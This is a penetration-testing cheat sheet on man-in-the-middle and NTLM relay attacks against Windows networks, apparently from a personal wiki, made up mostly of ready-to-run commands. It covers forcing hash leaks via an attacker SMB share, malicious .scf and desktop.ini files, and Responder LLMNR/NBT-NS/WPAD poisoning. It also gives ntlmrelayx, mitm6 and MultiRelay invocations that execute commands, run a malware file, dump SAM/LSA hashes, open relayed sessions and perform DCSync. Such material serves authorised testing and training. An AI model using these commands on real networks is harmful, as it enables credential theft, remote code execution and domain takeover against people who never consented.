MiTM & Relaying Attack

Force NTLM Authentication

To set up a smb share and make the victim load it in order to capture its hash:

sudo impacket-smbserver {name that you want} . -smb2support

Then load the resource. Examples:

Load in a web our share with curl or joining directly on the web

curl -s "http://school.flight.htb/?view=//10.10.14.10/parrotsec" &>/dev/null

Create a malicious icon that loads our share, if someone load the icon and log in we will have the hash

[.ShellClassInfo]
IconResource=\\10.10.14.10\parrotsec\

Create a malicious .scf file that loads our share

[Shell]
Command=2
IconFile=\\10.10.14.4\tools\nc.ico
[Taskbar]
Command=ToggleDesktop

We can also automatically upload a malicious icon that will load our smb server with the -M slinky option in netexec.

LLMNR, NBT-NS and MDNS

Microsoft systems use Link-Local Multicast Name Resolution (LLMNR) and the NetBIOS Name Service (NBT-NS) for local host resolution when DNS lookups fail. Apple Bonjour and Linux zero-configuration implementations use Multicast DNS (mDNS) to discover systems within a network. These protocols are unauthenticated and broadcast messages over UDP; thus, attackers can exploit them to direct users to malicious services.

We can impersonate services that are searched by hosts using Responder to send fake responses.

Responder for Linux: https://github.com/lgandx/Responder - Logs are stored in /usr/share/responder/logs

Responder for Windows: https://github.com/lgandx/Responder-Windows

Inveigh is C# and Powershell version: https://github.com/Kevin-Robertson/Inveigh

To start analyzing:

responder -A

To run it with default features:

responder -I <Iface>

To force NTLM (transparently)/Basic (prompt) authentication for the proxy and enable answers for netbios wredir suffix queries.

responder -I <Iface> -P -r -v

To capture NTLMv1 challenges and responses instead of NTLMv2 (these can be easily cracked: https://book.hacktricks.xyz/windows-hardening/ntlm#ntlmv1-attack):

responder -I <Iface> --lm --disable-ess

To start the WPAD rogue proxy server:

responder -I <Iface> --wpad

! Note that hashes captured are Net-NTLMv2, not NTLMv2, so must be cracked or relyed, pass-the-hash won't work.

Once obtained hashes, to parse them (/usr/share/responder/logs/):

cat *NTLM* | awk -F'::' '!seen[$1]++'

cat *NTLM* | awk -F'::' '{lines[$1]=$0} END {for (line in lines) print lines[line]}'

DHCP Poisoning

Windows uses several custom DHCP options such as NetBIOS, WINS, WPAD settings.

To inject a WPAD server in the DHCP response:

responder -I eth0 -Pdv

NTLM Relay

To do this through a C2, follow steps in NTLM Relaying Methodology w/ Cobalt section.

When combining NTLM relay with Responder for name poisoning, deactivate responder servers so they don't interfer with the ntlmrayx ones:

sed -i 's/SMB = On/SMB = Off/g' /PATH/TO/Responder/Responder.conf
sed -i 's/HTTP = On/HTTP = Off/g' /PATH/TO/Responder/Responder.conf

Aditionally, we should set up responder after ntlmrelayx:

responder -I eth0 --wredit --ProxyAuth

- Check SMB Signatures

crackmapexec smb {IP}

nmap -p445 --script smb2-security-mode {IP} -Pn

To generate a list of possible victims to relay:

crackmapexec smb --gen-relay-list targets.txt $SUBNET

- ntlmrelayx

impacket-ntlmrelayx --no-http-server -smb2support -t smb://{target ip} --no-wcf-server

To execute a command:

impacket-ntlmrelayx --no-http-server -smb2support -t {target ip} -c "ipconfig"

To get a session:

ntlmrelayx.py -tf targets.txt -smb2support -i

To execute a file:

ntlmrelayx.py -tf targets.txt -smb2support -e malware.exe

To dump SAM (remote dump of SAM and LSA):

ntlmrelayx.py -t smb://$TARGET

ntlmrelayx.py -tf targets.txt -smb2support

We can also specify a list of targets with -lf, the .txt file containing the targets should have one of the following formats:

smb://DOMAIN\User@192.168.1.101
smb://User@192.168.1.101
smb://target:port
http://target:port/somepath
ldaps://someserver.domain.lan
someserver.domain.lan

To relay the authentication and open a socks proxy (then we can run tools with proxychains socks4 localhost 1080, through the authenticated session):

ntlmrelayx.py -tf targets.txt -socks

To enumerate the AD through the authenticated sessions:

ntlmrelayx -t "ldap://domaincontroller" --dump-adcs --dump-laps --dump-gmsa

To perform a DCSync (target domain controller must be vulnerable to Zerologon):

ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER'

ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER' -auth-smb 'DOMAIN'/'LOW_PRIV_USER':'PASSWORD'

If we see that the target conections in responder are only done through http, maybe they have LLMNR, NBT-NS and MDNS disabled, so we can run the tool thorugh a specific http port (disable all responder servers and execute it right after the following command). Look at the port receiving in responder:

sudo impacket-ntlmrelayx -t all://{target} -smb2support --http-port 3128

If we see conections we could try the different ntlmrelay options (type help), then we could do the same by modifying all:// with smb:// or ldap:// to execute commands, dump credentials or enumerate the domain.

- mitm6

To perform a relay attack through IPv6:

mitm6 -d domain.com

ntlmrelayx -6 -wh <attacker IP> -t smb://<target IP> --socks -debug -smb2support

- MultiRelay

To relay all users (by default a shell is returned):

python /usr/share/responder/tools/MultiRelay.py -t <IP target> -u ALL

To execute a unique command:

python MultiRelay.py -t <IP target> -u ALL -c whoami

To dump hashes:

python MultiRelay.py -t <IP target> -u ALL -d

PreviousForest & Domain TrustsNextCloud

Last updated